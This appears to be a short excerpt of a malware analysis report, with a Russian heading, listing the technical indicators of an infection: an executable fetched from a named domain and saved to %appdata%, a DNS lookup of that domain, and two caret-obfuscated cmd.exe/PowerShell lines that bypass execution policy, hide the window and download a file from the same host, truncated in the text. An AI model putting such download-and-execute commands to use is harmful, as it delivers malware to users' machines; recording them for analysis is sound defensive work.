Техническая информация
- http://gorbatiegoidnei799.com/ttt/2002.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oW^E^rSH^E^L^L.^eXe ^-^EXeCut^I^OnpolIcy B^yp^ASs -N^oP^r^oFI^l^e^ -Wi^ndO^W^STyl^E hidD^E^n^ (n^Ew^-^obJ^ECt^ ^s^Y^st^e^m.n^et.w^e^b^cl^i^eN^t^)^.^D^ownlO^A^df^I^L^E(^'http://gor...
- DNS ASK go#####egoidnei799.com
- '<SYSTEM32>\cmd.exe' /c "p^oW^E^rSH^E^L^L.^eXe ^-^EXeCut^I^OnpolIcy B^yp^ASs -N^oP^r^oFI^l^e^ -Wi^ndO^W^STyl^E hidD^E^n^ (n^Ew^-^obJ^ECt^ ^s^Y^st^e^m.n^et.w^e^b^cl^i^eN^t^)^.^D^ownlO^A^df^I^L^E(^'http://gor...' (со скрытым окном)